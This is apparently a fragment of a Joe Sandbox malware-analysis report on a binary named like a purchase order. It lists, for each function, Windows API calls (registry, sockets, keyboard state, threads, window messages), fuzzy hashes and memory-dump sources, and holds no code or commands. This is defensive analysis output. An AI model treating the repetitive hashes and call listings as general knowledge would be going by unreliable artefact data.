                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_malloc
                                  • String ID:
                                  • API String ID: 1938898002-0
                                  • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                  • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                  • _memmove.LIBCMT ref: 0044B555
                                  • _memmove.LIBCMT ref: 0044B578
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                  • String ID:
                                  • API String ID: 2737351978-0
                                  • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                  • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                  APIs
                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                  • __calloc_crt.LIBCMT ref: 00415246
                                  • __getptd.LIBCMT ref: 00415253
                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                  • _free.LIBCMT ref: 0041529E
                                  • __dosmaperr.LIBCMT ref: 004152A9
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                  • String ID:
                                  • API String ID: 3638380555-0
                                  • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                  • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                  • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                  • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 3207048006-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  APIs
                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                  • _memmove.LIBCMT ref: 004656CA
                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                  • WSACleanup.WSOCK32 ref: 00465762
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                  • String ID:
                                  • API String ID: 2945290962-0
                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ConnectRegistry_memmove_wcslen
                                  • String ID:
                                  • API String ID: 15295421-0
                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcstok.LIBCMT ref: 004675B2
                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                  • _wcscpy.LIBCMT ref: 00467641
                                  • 758ED0D0.COMDLG32(00000058), ref: 00467774
                                  • _wcslen.LIBCMT ref: 00467793
                                  • _wcslen.LIBCMT ref: 004677BD
                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                  • 758ED1A0.COMDLG32(00000058), ref: 00467807
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_memmove$__getptd_wcscpy_wcstok
                                  • String ID: X
                                  • API String ID: 3297605031-3081909835
                                  • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                  • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                  • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                  • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                  • String ID:
                                  • API String ID: 2027346449-0
                                  • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                  • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • GetMenu.USER32 ref: 0047A703
                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                  • _wcslen.LIBCMT ref: 0047A79E
                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                  • String ID:
                                  • API String ID: 3257027151-0
                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                  APIs
                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLastselect
                                  • String ID:
                                  • API String ID: 215497628-0
                                  • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                  • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  APIs
                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                  • 6FDC0200.COMCTL32(?,?), ref: 004553D3
                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Similarity
                                  • API ID: DeleteMessageObjectSend$74285C0200CursorDestroy
                                  • String ID:
                                  APIs
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Similarity
                                  • API ID: Window$Enable$Show$MessageMoveSend
                                  • String ID:
                                  APIs
                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                  • GetFocus.USER32 ref: 00448ACF
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Similarity
                                  • API ID: Window$Enable$Show$FocusMessageSend
                                  • String ID:
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                  • __swprintf.LIBCMT ref: 0045D4E9
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume__swprintf
                                  • String ID: %lu$\VH
                                  APIs
                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Msctls_Progress32
                                  Similarity
                                  • API ID: 74285A0860DeleteObject$CursorDestroy
                                  • String ID:
                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: RtlAllocateHeap.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                  • String ID:
                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                  • GetClientRect.USER32(?,?), ref: 00430364
                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
